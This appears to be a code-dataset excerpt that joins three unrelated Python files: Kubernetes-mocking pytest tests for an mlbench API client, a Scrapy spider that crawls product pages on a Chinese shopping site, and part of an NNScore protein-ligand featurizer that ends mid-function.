    """Mock CoreV1Api: one NodePort service (node_port 12345) on a node with ExternalIP 1.1.1.1."""
    mock_client = mocker.patch("kubernetes.client.CoreV1Api")
    mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.type = (
        "NodePort"
    )
    mock_client.return_value.list_service_for_all_namespaces.return_value.items.__len__.return_value = (
        1
    )
    mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.ports.__iter__.return_value = [
        mocker.MagicMock(node_port=12345, port=80)
    ]
    mock_client.return_value.list_namespaced_pod.return_value.items.__len__.return_value = (
        1
    )
    mock_client.return_value.read_node.return_value.status.addresses.__len__.return_value = (
        1
    )
    mock_client.return_value.read_node.return_value.status.addresses.__iter__.return_value = [
        mocker.MagicMock(type="ExternalIP", address="1.1.1.1")
    ]
    return mock_client
@pytest.fixture
def kubernetes_api_client_node_port_internal(mocker):
    """Mock CoreV1Api: one NodePort service whose node only exposes an InternalIP (1.1.1.1)."""
    mock_client = mocker.patch("kubernetes.client.CoreV1Api")
    mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.type = (
        "NodePort"
    )
    mock_client.return_value.list_service_for_all_namespaces.return_value.items.__len__.return_value = (
        1
    )
    mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.ports.__iter__.return_value = [
        mocker.MagicMock(node_port=12345, port=80)
    ]
    mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.ports.__len__.return_value = (
        1
    )
    mock_client.return_value.list_namespaced_pod.return_value.items.__len__.return_value = (
        1
    )
    mock_client.return_value.read_node.return_value.status.addresses.__len__.return_value = (
        1
    )
    mock_client.return_value.read_node.return_value.status.addresses.__iter__.return_value = [
        mocker.MagicMock(type="InternalIP", address="1.1.1.1")
    ]
    return mock_client
@pytest.fixture
def kubernetes_api_client_clusterip(mocker):
    """Mock CoreV1Api: one ClusterIP service at 1.1.1.1:12345."""
    mock_client = mocker.patch("kubernetes.client.CoreV1Api")
    mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.type = (
        "ClusterIP"
    )
    mock_client.return_value.list_service_for_all_namespaces.return_value.items.__len__.return_value = (
        1
    )
    mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.cluster_ip = (
        "1.1.1.1"
    )
    mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.ports.__getitem__.return_value.port = (
        12345
    )
    return mock_client
@pytest.fixture
def kubernetes_api_client_loadbalancer(mocker):
    """Mock CoreV1Api: one LoadBalancer service with ingress IP 1.1.1.1 on port 12345."""
    mock_client = mocker.patch("kubernetes.client.CoreV1Api")
    mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.type = (
        "LoadBalancer"
    )
    mock_client.return_value.list_service_for_all_namespaces.return_value.items.__len__.return_value = (
        1
    )
    mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.ports.__getitem__.return_value.port = (
        12345
    )
    mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.status.load_balancer.ingress.ip = (
        "1.1.1.1"
    )
    return mock_client
@pytest.fixture
def kubernetes_api_client_incluster(mocker):
    """Mock CoreV1Api: a single namespaced pod with pod IP 1.1.1.1 (in-cluster discovery)."""
    mock_client = mocker.patch("kubernetes.client.CoreV1Api")
    mock_client.return_value.list_namespaced_pod.return_value.items.__len__.return_value = (
        1
    )
    mock_client.return_value.list_namespaced_pod.return_value.items.__getitem__.return_value.status.pod_ip = (
        "1.1.1.1"
    )
    return mock_client
def test_instantiation(mocker, kubernetes_api_client_node_port):
    """ApiClient (context-manager form) resolves a NodePort service via the node's ExternalIP."""
    mocker.patch("kubernetes.config.load_kube_config")
    with ApiClient(in_cluster=False) as client:
        assert client is not None
        assert client.endpoint == "http://1.1.1.1:12345/api/"
def test_instantiation_nodeport_internal(
    mocker, kubernetes_api_client_node_port_internal
):
    """ApiClient falls back to a node's InternalIP when no ExternalIP exists."""
    mocker.patch("kubernetes.config.load_kube_config")
    client = ApiClient(in_cluster=False)
    assert client is not None
    assert client.endpoint == "http://1.1.1.1:12345/api/"
def test_instantiation_url():
    """An explicit ``url=`` bypasses Kubernetes service discovery entirely."""
    client = ApiClient(url="1.1.1.1:12345")
    assert client is not None
    assert client.endpoint == "http://1.1.1.1:12345/api/"
def test_instantiation_incluster(mocker, kubernetes_api_client_incluster):
    """In-cluster mode resolves the dashboard pod's IP on port 80."""
    mocker.patch("kubernetes.config.load_incluster_config")
    client = ApiClient(in_cluster=True)
    assert client is not None
    assert client.endpoint == "http://1.1.1.1:80/api/"
def test_instantiation_clusterip(mocker, kubernetes_api_client_clusterip):
    """ApiClient resolves a ClusterIP service from its cluster_ip and port."""
    mocker.patch("kubernetes.config.load_kube_config")
    client = ApiClient(in_cluster=False)
    assert client is not None
    assert client.endpoint == "http://1.1.1.1:12345/api/"
def test_instantiation_loadbalancer(mocker, kubernetes_api_client_loadbalancer):
    """ApiClient resolves a LoadBalancer service from its ingress IP and port."""
    mocker.patch("kubernetes.config.load_kube_config")
    client = ApiClient(in_cluster=False)
    assert client is not None
    assert client.endpoint == "http://1.1.1.1:12345/api/"
def test_get_all_metrics(mocker, kubernetes_api_client_node_port):
    """get_all_metrics returns the future produced by the mocked executor."""
    mocker.patch("kubernetes.config.load_kube_config")
    rg = mocker.patch("concurrent.futures.ThreadPoolExecutor")
    rg.return_value.submit.return_value.result.return_value.json.return_value = "a"
    client = ApiClient(in_cluster=False)
    result = client.get_all_metrics()
    assert result is not None
    assert result.result().json() == "a"
def test_get_run_metrics(mocker, kubernetes_api_client_node_port):
    """get_run_metrics accepts run id, ``since`` and ``summarize`` arguments."""
    mocker.patch("kubernetes.config.load_kube_config")
    rg = mocker.patch("concurrent.futures.ThreadPoolExecutor")
    rg.return_value.submit.return_value.result.return_value.json.return_value = "a"
    client = ApiClient(in_cluster=False)
    result = client.get_run_metrics("1", since=datetime.datetime.now(), summarize=100)
    assert result is not None
    assert result.result().json() == "a"
def test_get_pod_metrics(mocker, kubernetes_api_client_node_port):
    """get_pod_metrics accepts a pod name, ``since`` and ``summarize`` arguments."""
    mocker.patch("kubernetes.config.load_kube_config")
    rg = mocker.patch("concurrent.futures.ThreadPoolExecutor")
    rg.return_value.submit.return_value.result.return_value.json.return_value = "a"
    client = ApiClient(in_cluster=False)
    result = client.get_pod_metrics(
        "rel-mlbench-worker-0", since=datetime.datetime.now(), summarize=100
    )
    assert result is not None
    assert result.result().json() == "a"
def test_post_metrics(mocker, kubernetes_api_client_node_port):
    """post_metric submits a named metric value for a run and returns the future."""
    mocker.patch("kubernetes.config.load_kube_config")
    rg = mocker.patch("concurrent.futures.ThreadPoolExecutor")
    rg.return_value.submit.return_value.result.return_value.json.return_value = "a"
    client = ApiClient(in_cluster=False)
    result = client.post_metric("1", "loss", 10.0, cumulative=False)
    assert result is not None
    assert result.result().json() == "a"
def test_get_runs(mocker, kubernetes_api_client_node_port):
    """get_runs returns the future produced by the mocked executor."""
    mocker.patch("kubernetes.config.load_kube_config")
    rg = mocker.patch("concurrent.futures.ThreadPoolExecutor")
    rg.return_value.submit.return_value.result.return_value.json.return_value = "a"
    client = ApiClient(in_cluster=False)
    result = client.get_runs()
    assert result is not None
    assert result.result().json() == "a"
def test_get_run(mocker, kubernetes_api_client_node_port):
    """get_run fetches a single run by id and returns the future."""
    mocker.patch("kubernetes.config.load_kube_config")
    rg = mocker.patch("concurrent.futures.ThreadPoolExecutor")
    rg.return_value.submit.return_value.result.return_value.json.return_value = "a"
    client = ApiClient(in_cluster=False)
    result = client.get_run("1")
    assert result is not None
    assert result.result().json() == "a"
def test_create_run_official(mocker, kubernetes_api_client_node_port):
    """create_run with an official benchmark image name returns the future."""
    mocker.patch("kubernetes.config.load_kube_config")
    rg = mocker.patch("concurrent.futures.ThreadPoolExecutor")
    rg.return_value.submit.return_value.result.return_value.json.return_value = "a"
    client = ApiClient(in_cluster=False)
    result = client.create_run(
        "test_run",
        5,
        num_cpus=4.1,
        max_bandwidth=10000,
        image="PyTorch Cifar-10 ResNet-20",
    )
    assert result is not None
    assert result.result().json() == "a"
def test_create_run_custom(mocker, kubernetes_api_client_node_port):
    """create_run with a custom image name/command returns the future."""
    mocker.patch("kubernetes.config.load_kube_config")
    rg = mocker.patch("concurrent.futures.ThreadPoolExecutor")
    rg.return_value.submit.return_value.result.return_value.json.return_value = "a"
    client = ApiClient(in_cluster=False)
    result = client.create_run(
        "test_run",
        5,
        num_cpus=4.1,
        max_bandwidth=10000,
        custom_image_name="localhost:5000/mlbench_worker:latest",
        custom_image_command="/.openmpi/bin/mpirun /app/main.py",
        run_all_nodes=False,
    )
    assert result is not None
    assert result.result().json() == "a"
def test_get_worker_pods(mocker, kubernetes_api_client_node_port):
    """get_worker_pods returns the future produced by the mocked executor."""
    mocker.patch("kubernetes.config.load_kube_config")
    rg = mocker.patch("concurrent.futures.ThreadPoolExecutor")
    rg.return_value.submit.return_value.result.return_value.json.return_value = "a"
    client = ApiClient(in_cluster=False)
    result = client.get_worker_pods()
    assert result is not None
    assert result.result().json() == "a"
| StarcoderdataPython |
3329628 | # -*- coding: utf-8 -*-
from scrapy.selector import Selector
from ..items import BaseItem, ImageItem, SkuItem, Color
from scrapy import Request, FormRequest
import re
import execjs
from ..spiders.shiji_base import BaseSpider
from urllib import quote
class TjzmallSpider(BaseSpider):
    """Scrapy spider for me.tjzmall.com: crawls category navigation, product
    listings (with pagination) and product detail pages, yielding BaseItem,
    Color and sku dictionaries."""
    name = "tjzmall"
    allowed_domains = ["tjzmall.com"]
    # In production, start_urls is empty; the spider is fed requests via redis.
    custom_settings = {
        'DOWNLOAD_DELAY': 0.5,
        'DOWNLOAD_TIMEOUT': 30,
        'RETRY_TIMES': 20,
    }
    base_url = 'https://me.tjzmall.com'
    start_urls = [
        'http://me.tjzmall.com/default/',
        'http://me.tjzmall.com/default/jin-kou-shi-pin/cheng-ren-nai-fen.html',
        'http://me.tjzmall.com/default/shoes.html?cat=578'
    ]
    # Hard-coded gender/product_type/category metadata for the two start
    # URLs that are list pages rather than the site's front page.
    start_urls_gender_product_type_dict = {
        'http://me.tjzmall.com/default/jin-kou-shi-pin/cheng-ren-nai-fen.html': {'gender': 'unisex', 'product_type': u'食品饮料', 'category': u'成人奶粉'},
        'http://me.tjzmall.com/default/shoes.html?cat=578': {'gender': 'women', 'product_type': u'生活用品', 'category': u'卫生巾'}
    }
    # Entry point: parse the first batch of requests, one per top-level category.
    def start_requests(self):
        """Yield one request per configured start URL."""
        for url in self.start_urls:
            yield Request(url)
    def parse(self, response):
        """Parse the navigation menu into (category, gender, product_type)
        tuples and schedule one parse_list request per category link.
        Gender is inferred from keywords in the product-type text."""
        sel = Selector(response)
        if response.url in self.start_urls_gender_product_type_dict.keys():
            category = self.start_urls_gender_product_type_dict[response.url]['category']
            gender = self.start_urls_gender_product_type_dict[response.url]['gender']
            product_type = self.start_urls_gender_product_type_dict[response.url]['product_type']
            yield Request(response.url, callback=self.parse_list, meta={"category": category, "gender": gender, "product_type": product_type}, dont_filter=True)
        nav_lis = sel.xpath('//div[@class="orderDivId orderDivShow"]/dl')[1:-1]
        for nav_li in nav_lis:
            product_type_as = nav_li.xpath('./dd/ul/li/strong/a')
            for index, product_type_a in enumerate(product_type_as):
                product_type = product_type_a.xpath('./text()').extract()[0].strip()
                # Skip the "by effect" pseudo-category.
                if product_type == '按功效':
                    continue
                category_as = nav_li.xpath('./dd/ul/li/div[' + str(index+1) + ']/a')
                for category_a in category_as:
                    # Keyword-based gender inference (women/men/baby/pregnant).
                    if '女' in product_type:
                        gender = 'women'
                    elif '男' in product_type:
                        gender = 'men'
                    elif '宝宝' in product_type:
                        gender = 'baby'
                    elif '婴儿' in product_type:
                        gender = 'baby'
                    elif '孕妇' in product_type:
                        gender = 'women'
                    else:
                        gender = 'unisex'
                    category = product_type + category_a.xpath('./text()').extract()[0].strip()
                    category_url = category_a.xpath('./@href').extract()[0]
                    yield Request(category_url, callback=self.parse_list, meta={"category": category, "gender": gender, "product_type": product_type})
    def parse_list(self, response):
        """Parse a product-grid listing page, yielding one parse_item request
        per product and following the "next page" link when present."""
        category = response.meta['category']
        gender = response.meta['gender']
        product_type = response.meta['product_type']
        sel = Selector(response)
        product_lis = sel.xpath('//ul[contains(@class, "products-grid")]/li')
        for goods_detail in product_lis:
            item = BaseItem()
            item['type'] = 'base'
            item['from_site'] = 'tjzmall'
            item['category'] = category
            item['product_type'] = product_type
            item['gender'] = gender
            item['url'] = goods_detail.xpath('./h2/a/@href').extract()[0]
            item['cover'] = goods_detail.xpath('./a/img/@src').extract()[0]
            item['title'] = goods_detail.xpath('./h2/a/text()').extract()[0]
            yield Request(item['url'], callback=self.parse_item, meta={"item": item})
        if len(sel.xpath('//a[@class="next i-next"]')) > 0:
            next_url = sel.xpath('//a[@class="next i-next"]/@href').extract()[0]
            yield Request(next_url, callback=self.parse_list, meta={"category": category, "gender": gender, "product_type": product_type})
    def parse_item(self, response):
        """Delegate product-detail parsing to handle_parse_item."""
        item = response.meta['item']
        return self.handle_parse_item(response, item)
    def handle_parse_item(self, response, item):
        """Extract product id, brand, description, price and images from a
        detail page; yields a Color item followed by the completed base item
        (single color/size, one synthetic sku)."""
        sel = Selector(response)
        item['show_product_id'] = sel.xpath('//div[@class="product-shop"]/p[4]/span[2]/text()').extract()[0]
        # When p[4] holds the "no cash-on-delivery" notice, the id lives in p[5].
        if sel.xpath('//div[@class="product-shop"]/p[4]/span[2]/text()').extract()[0] == '本商品不支持货到付款':
            item['show_product_id'] = sel.xpath('//div[@class="product-shop"]/p[5]/span[2]/text()').extract()[0]
        item['brand'] = re.search('品牌</td><td>(.+)</td>', response.body).group(1)
        item['desc'] = []
        if len(sel.xpath('//div[@class="short-description"]/div/text()')) > 0:
            item['desc'] = sel.xpath('//div[@class="short-description"]/div/text()').extract()
        item['desc'] += sel.xpath('//div[@class="products-param"]/table').extract()
        item['desc'] += sel.xpath('//div[@class="std"]/img').extract()
        item['desc'] = ''.join(item['desc'])
        price = sel.xpath('//div[@class="product-shop"]/p[@class="regular-price"]/span/span/text()').extract()[0]
        colorItem = Color()
        images = []
        image_lis = sel.xpath('//div[@class="product-img-box"]/div[@class="more-views"]/ul/li')
        for image_li in image_lis:
            imageItem = ImageItem()
            imageItem['image'] = image_li.xpath('./a/@href').extract()[0]
            # Thumbnail URL: insert '320x320/' right after the 'image/' path segment.
            imageItem['thumbnail'] = imageItem['image'][:(imageItem['image'].find('image') + 6)] + '320x320/' +imageItem['image'][(imageItem['image'].find('image') + 6):]
            images.append(imageItem)
            # First listed image doubles as the color cover.
            if 'cover' not in colorItem.keys():
                colorItem['cover'] = image_li.xpath('./a/img/@src').extract()[0]
        colorItem['images'] = images
        colorItem['type'] = 'color'
        colorItem['from_site'] = item['from_site']
        colorItem['show_product_id'] = item['show_product_id']
        colorItem['name'] = 'One Color'
        yield colorItem
        # The site has no color/size variants, so synthesize a single sku.
        skuItem = {}
        skuItem['type'] = 'sku'
        skuItem['show_product_id'] = item['show_product_id']
        skuItem['id'] = item['show_product_id'] + '-sku'
        skuItem['color'] = 'One Color'
        skuItem['size'] = 'One Size'
        skuItem['from_site'] = item['from_site']
        skuItem['current_price'] = price
        skuItem['list_price'] = price
        skuItem['is_outof_stock'] = False
        item['colors'] = ['One Color']
        item['sizes'] = ['One Size']
        item['skus'] = [skuItem]
        yield item
| StarcoderdataPython |
3221610 | <filename>vs_utils/features/nnscore.py
"""
The following code implements a featurizer based on NNScore 2.0.1
## The following notice is copied from the original NNScore file.
# NNScore 2.01 is released under the GNU General Public License (see
# http://www.gnu.org/licenses/gpl.html).
# If you have any questions, comments, or suggestions, please don't
# hesitate to contact me, <NAME>, at jdurrant [at] ucsd [dot]
# edu. If you use NNScore 2.01 in your work, please cite [REFERENCE
# HERE].
"""
import os
import math
import re
import itertools
import tempfile
import shutil
import numpy as np
from vs_utils.features import ComplexFeaturizer
from vs_utils.utils.nnscore_pdb import PDB
from vs_utils.utils.nnscore_utils import Point
from vs_utils.utils.nnscore_utils import angle_between_points
from vs_utils.utils.nnscore_utils import angle_between_three_points
from vs_utils.utils.nnscore_utils import project_point_onto_plane
from vs_utils.utils.nnscore_utils import hydrogenate_and_compute_partial_charges
__author__ = "<NAME>"
__license__ = "GNU General Public License"
# --- Interaction-geometry constants (distances in angstroms, angles in degrees) ---
#ELECTROSTATIC_JOULE_PER_MOL = 138.94238460104697e4 # units?
# This is just a scaling factor, so it's set so as to keep the network
# inputs roughly contained in 0-1
ELECTROSTATIC_JOULE_PER_MOL = 10.0
# O-H distance is 0.96 A, N-H is 1.01 A. See
# http://www.science.uwaterloo.ca/~cchieh/cact/c120/bondel.html
H_BOND_DIST = 1.3 # angstroms
H_BOND_ANGLE = 40 # degrees
# If atoms are < 2.5 A apart, we count it as a close contact
CLOSE_CONTACT_CUTOFF = 2.5
# If receptor and ligand atoms are > 4 A apart, we consider them
# unable to interact with simple electrostatics.
CONTACT_CUTOFF = 4 # angstroms
# "PI-Stacking Interactions ALIVE AND WELL IN PROTEINS" says
# distance of 7.5 A is good cutoff. This seems really big to me,
# except that pi-pi interactions (parallel) are actually usually
# off centered. Interesting paper. Note that adenine and
# tryptophan count as two aromatic rings. So, for example, an
# interaction between these two, if positioned correctly, could
# count for 4 pi-pi interactions.
PI_PI_CUTOFF = 7.5
# Cation-pi interaction cutoff based on
# "Cation-pi interactions in structural biology."
CATION_PI_CUTOFF = 6.0
# 4 is good cutoff for salt bridges according to
# "Close-Range Electrostatic Interactions in Proteins",
# but looking at complexes, I decided to go with 5.5 A
SALT_BRIDGE_CUTOFF = 5.5
# This is perhaps controversial. I noticed that often a pi-cation
# interaction or other pi interaction was only slightly off, but
# looking at the structure, it was clearly supposed to be a pi-cation
# interaction. I've decided then to artificially expand the radius of
# each pi ring. Think of this as adding in a VDW radius, or
# accounting for poor crystal-structure resolution, or whatever you
# want to justify it.
PI_PADDING = 0.75
def hashtable_entry_add_one(hashtable, key, toadd=1):
  """Increment ``hashtable[key]`` by ``toadd``, creating the entry at 0 if absent.

  The dictionary is mutated in place (dicts are passed by reference in python).

  Parameters
  ----------
  hashtable: dict
    Counter-style dictionary to update.
  key: hashable
    Entry to increment.
  toadd: number
    Amount to add (default 1).
  """
  # ``dict.has_key`` is Python-2-only; ``dict.get`` behaves identically,
  # also works on Python 3, and does a single lookup instead of two.
  hashtable[key] = hashtable.get(key, 0) + toadd
def clean_atomtype(atomtype):
  """Strip trailing charge annotations from a PDB atomtype (e.g. "O1+" -> "O").

  Atomtypes occasionally carry formal-charge suffixes: one or more digits
  followed by an optional '+' or '-'. These are removed via a regexp.

  Parameters
  ----------
  atomtype: str
    Raw atomtype string extracted from a PDB file.
  """
  charge_suffix = r'[0-9]+[+-]?'
  return re.sub(charge_suffix, '', atomtype)
def compute_hydrophobic_contacts(ligand, receptor):
  """Count hydrophobic (carbon-carbon) contacts between ligand and receptor.

  A contact is any ligand-carbon / receptor-carbon pair whose distance is
  below CONTACT_CUTOFF. Returns a dictionary keyed by
  "${RESIDUETYPE}_${STRUCTURE}", where RESIDUETYPE is "SIDECHAIN" or
  "BACKBONE" (from the receptor atom) and STRUCTURE is the receptor atom's
  secondary-structure label; values are contact counts.

  Parameters
  ----------
  ligand: PDB
    A PDB Object describing the ligand molecule.
  receptor: PDB
    A PDB object describing the receptor protein.
  """
  contacts = {
      'BACKBONE_ALPHA': 0, 'BACKBONE_BETA': 0, 'BACKBONE_OTHER': 0,
      'SIDECHAIN_ALPHA': 0, 'SIDECHAIN_BETA': 0, 'SIDECHAIN_OTHER': 0}
  for lig_atom in ligand.all_atoms.values():
    for rec_atom in receptor.all_atoms.values():
      if lig_atom.coordinates.dist_to(rec_atom.coordinates) >= CONTACT_CUTOFF:
        continue
      if lig_atom.element == "C" and rec_atom.element == "C":
        contact_key = (rec_atom.side_chain_or_backbone() + "_" +
                       rec_atom.structure)
        hashtable_entry_add_one(contacts, contact_key)
  return contacts
def compute_electrostatic_energy(ligand, receptor):
  """
  Compute electrostatic energy between ligand and atom.

  Returns a dictionary whose keys are atompairs of type
  "${ATOMTYPE}_${ATOMTYPE}". The ATOMTYPE terms can equal "C", "O",
  etc. One ATOMTYPE belongs to receptor, the other to ligand, but
  information on which is which isn't preserved
  (i.e., C-receptor, O-ligand and C-ligand, O-receptor generate the same
  key). The values are the sum of associated coulomb energies for such
  pairs (i.e., if there are three C_O interactions with energies 1, 2,
  and 3 respectively, the total energy is 6).

  Parameters
  ----------
  ligand: PDB
    A PDB Object describing the ligand molecule.
  receptor: PDB
    A PDB object describing the receptor protein.
  """
  # Pre-populate every unordered type pair with energy 0 so the returned
  # dictionary always has the full key set, even with no interactions.
  electrostatics = {}
  for first, second in itertools.product(
      Binana.atom_types, Binana.atom_types):
    key = "_".join(sorted([first, second]))
    electrostatics[key] = 0
  for ligand_index in ligand.all_atoms:
    ligand_atom = ligand.all_atoms[ligand_index]
    for receptor_index in receptor.all_atoms:
      receptor_atom = receptor.all_atoms[receptor_index]
      # Sorting makes the pair key direction-independent (ligand/receptor
      # roles are intentionally not preserved).
      atomtypes = [clean_atomtype(atom) for atom in
          [ligand_atom.atomtype, receptor_atom.atomtype]]
      key = "_".join(sorted(atomtypes))
      dist = ligand_atom.coordinates.dist_to(receptor_atom.coordinates)
      if dist < CONTACT_CUTOFF:
        ligand_charge = ligand_atom.charge
        receptor_charge = receptor_atom.charge
        # to convert into J/mol; might be nice to double check this
        # TODO(bramsundar): What are units of
        # ligand_charge/receptor_charge?
        coulomb_energy = ((ligand_charge * receptor_charge / dist)
            * ELECTROSTATIC_JOULE_PER_MOL)
        # Accumulates (sums) energies per key rather than counting pairs.
        hashtable_entry_add_one(
            electrostatics, key, coulomb_energy)
  return electrostatics
def compute_ligand_atom_counts(ligand):
  """Tally how many atoms of each type the ligand contains.

  Every type in ``Binana.atom_types`` is zero-initialized, so types absent
  from the ligand still appear with count 0. Atomtypes are cleaned of
  charge suffixes before counting, so cleaned types outside
  ``Binana.atom_types`` may also be added.

  Parameters
  ----------
  ligand: PDB Object
    Stores ligand information.

  Returns
  -------
  counts: dictionary
    Keys are atom types; values are integer counts.
  """
  counts = {atom_type: 0 for atom_type in Binana.atom_types}
  for atom in ligand.all_atoms.values():
    hashtable_entry_add_one(counts, clean_atomtype(atom.atomtype))
  return counts
def compute_active_site_flexibility(ligand, receptor):
  """
  Compute statistics to judge active-site flexibility.

  Counts, for every receptor atom within CONTACT_CUTOFF of any ligand
  atom, its residue/structure class. Returns a dictionary whose keys are
  of type "${RESIDUETYPE}_${STRUCTURE}" where RESIDUETYPE is either
  "SIDECHAIN" or "BACKBONE" and STRUCTURE is either ALPHA, BETA, or OTHER
  and corresponds to the protein secondary structure of the current
  residue.

  Parameters
  ----------
  ligand: PDB
    A PDB Object describing the ligand molecule.
  receptor: PDB
    A PDB object describing the receptor protein.
  """
  active_site_flexibility = {
      'BACKBONE_ALPHA': 0, 'BACKBONE_BETA': 0, 'BACKBONE_OTHER': 0,
      'SIDECHAIN_ALPHA': 0, 'SIDECHAIN_BETA': 0, 'SIDECHAIN_OTHER': 0}
  for ligand_index in ligand.all_atoms:
    ligand_atom = ligand.all_atoms[ligand_index]
    for receptor_index in receptor.all_atoms:
      receptor_atom = receptor.all_atoms[receptor_index]
      dist = ligand_atom.coordinates.dist_to(receptor_atom.coordinates)
      if dist < CONTACT_CUTOFF:
        # Classify the receptor atom by chain position and secondary structure.
        flexibility_key = (receptor_atom.side_chain_or_backbone() + "_"
            + receptor_atom.structure)
        hashtable_entry_add_one(active_site_flexibility, flexibility_key)
  return active_site_flexibility
def compute_pi_t(ligand, receptor):
  """
  Computes T-shaped (perpendicular) pi-pi interactions.

  Returns a dictionary with keys of form T-SHAPED_${STRUCTURE} where
  STRUCTURE is "ALPHA" or "BETA" or "OTHER". Values are counts of the
  number of such stacking interactions.

  Parameters
  ----------
  ligand: PDB Object.
    small molecule to dock.
  receptor: PDB Object
    protein to dock agains.
  """
  pi_t = {'T-SHAPED_ALPHA': 0, 'T-SHAPED_BETA': 0, 'T-SHAPED_OTHER': 0}
  for lig_aromatic in ligand.aromatic_rings:
    for rec_aromatic in receptor.aromatic_rings:
      # Compare ring-plane normals; near-90-degree angles mean the rings
      # are roughly perpendicular (the T-shaped geometry).
      lig_aromatic_norm_vector = Point(
          coords=np.array([lig_aromatic.plane_coeff[0],
                           lig_aromatic.plane_coeff[1],
                           lig_aromatic.plane_coeff[2]]))
      rec_aromatic_norm_vector = Point(
          coords=np.array([rec_aromatic.plane_coeff[0],
                           rec_aromatic.plane_coeff[1],
                           rec_aromatic.plane_coeff[2]]))
      angle_between_planes = (
          angle_between_points(
              lig_aromatic_norm_vector, rec_aromatic_norm_vector)
          * 180.0/math.pi)
      if (math.fabs(angle_between_planes-90) < 30.0
          or math.fabs(angle_between_planes-270) < 30.0):
        # so they're more or less perpendicular, it's probably a
        # pi-edge interaction having looked at many structures, I
        # noticed the algorithm was identifying T-pi reactions
        # when the two rings were in fact quite distant, often
        # with other atoms in between. Eye-balling it, requiring
        # that at their closest they be at least 5 A apart seems
        # to separate the good T's from the bad
        min_dist = 100.0
        for ligand_ind in lig_aromatic.indices:
          ligand_at = ligand.all_atoms[ligand_ind]
          for receptor_ind in rec_aromatic.indices:
            receptor_at = receptor.all_atoms[receptor_ind]
            dist = ligand_at.coordinates.dist_to(receptor_at.coordinates)
            if dist < min_dist:
              min_dist = dist
        if min_dist <= 5.0:
          # so at their closest points, the two rings come within
          # 5 A of each other.
          # okay, is the ligand pi pointing into the receptor
          # pi, or the other way around? first, project the
          # center of the ligand pi onto the plane of the
          # receptor pi, and vs. versa
          # This could be directional somehow, like a hydrogen
          # bond.
          pt_on_receptor_plane = project_point_onto_plane(
              lig_aromatic.center, rec_aromatic.plane_coeff)
          pt_on_ligand_plane = project_point_onto_plane(
              rec_aromatic.center, lig_aromatic.plane_coeff)
          # now, if it's a true pi-T interaction, this projected
          # point should fall within the ring whose plane it's
          # been projected into (radius padded by PI_PADDING).
          if ((pt_on_receptor_plane.dist_to(rec_aromatic.center)
               <= rec_aromatic.radius + PI_PADDING) or
              (pt_on_ligand_plane.dist_to(lig_aromatic.center)
               <= lig_aromatic.radius + PI_PADDING)):
            # so it is in the ring on the projected plane.
            structure = receptor.all_atoms[rec_aromatic.indices[0]].structure
            if structure == "":
              # since it could be interacting with a cofactor or something
              structure = "OTHER"
            key = "T-SHAPED_" + structure
            hashtable_entry_add_one(pi_t, key)
  return pi_t
def compute_hydrogen_bonds(ligand, receptor):
  """
  Computes hydrogen bonds between ligand and receptor.

  A bond is counted for each electronegative ligand/receptor atom pair
  (within CONTACT_CUTOFF) bridged by a hydrogen within H_BOND_DIST of
  either heavy atom, with a near-linear D-H-A geometry (H_BOND_ANGLE).

  Returns a dictionary whose keys are of form
  HDONOR-${MOLTYPE}_${RESIDUETYPE}_${STRUCTURE} where MOLTYPE is either
  "RECEPTOR" or "LIGAND" (the side the bridging hydrogen belongs to,
  i.e. the donor side), RESIDUETYPE is "BACKBONE" or "SIDECHAIN" and
  where STRUCTURE is "ALPHA" or "BETA" or "OTHER". The values are counts
  of the numbers of hydrogen bonds associated with the given keys.

  Parameters
  ----------
  ligand: PDB
    A PDB Object describing the ligand molecule.
  receptor: PDB
    A PDB object describing the receptor protein.
  """
  hbonds = {
      'HDONOR-LIGAND_BACKBONE_ALPHA': 0,
      'HDONOR-LIGAND_BACKBONE_BETA': 0,
      'HDONOR-LIGAND_BACKBONE_OTHER': 0,
      'HDONOR-LIGAND_SIDECHAIN_ALPHA': 0,
      'HDONOR-LIGAND_SIDECHAIN_BETA': 0,
      'HDONOR-LIGAND_SIDECHAIN_OTHER': 0,
      'HDONOR-RECEPTOR_BACKBONE_ALPHA': 0,
      'HDONOR-RECEPTOR_BACKBONE_BETA': 0,
      'HDONOR-RECEPTOR_BACKBONE_OTHER': 0,
      'HDONOR-RECEPTOR_SIDECHAIN_ALPHA': 0,
      'HDONOR-RECEPTOR_SIDECHAIN_BETA': 0,
      'HDONOR-RECEPTOR_SIDECHAIN_OTHER': 0}
  for ligand_index in ligand.all_atoms:
    ligand_atom = ligand.all_atoms[ligand_index]
    for receptor_index in receptor.all_atoms:
      receptor_atom = receptor.all_atoms[receptor_index]
      # Now see if there's some sort of hydrogen bond between
      # these two atoms. distance cutoff = H_BOND_DIST, angle cutoff =
      # H_BOND_ANGLE.
      dist = ligand_atom.coordinates.dist_to(receptor_atom.coordinates)
      if dist < CONTACT_CUTOFF:
        electronegative_atoms = ["O", "N", "F"]
        if ((ligand_atom.element in electronegative_atoms)
            and (receptor_atom.element in electronegative_atoms)):
          # Collect hydrogens near either heavy atom; ``comment`` tags the
          # side the hydrogen (and hence the donor) belongs to.
          hydrogens = []
          # TODO(rbharath): This is a horrible inner-loop search. Can
          # this be made more efficient?
          for atm_index in ligand.all_atoms:
            atom = ligand.all_atoms[atm_index]
            if atom.element == "H":
              # Make sure to set comment (used below)
              atom.comment = "LIGAND"
              if (atom.coordinates.dist_to(ligand_atom.coordinates)
                  < H_BOND_DIST):
                hydrogens.append(atom)
          for atm_index in receptor.all_atoms:
            atom = receptor.all_atoms[atm_index]
            if atom.element == "H":
              # Make sure to set comment (used below)
              atom.comment = "RECEPTOR"
              if (atom.coordinates.dist_to(receptor_atom.coordinates)
                  < H_BOND_DIST):
                hydrogens.append(atom)
          #print "nearby hydrogens: " + str(hydrogens)
          # now we need to check the angles
          # TODO(rbharath): Rather than using this heuristic, it seems like
          # it might be better to just report the angle in the feature
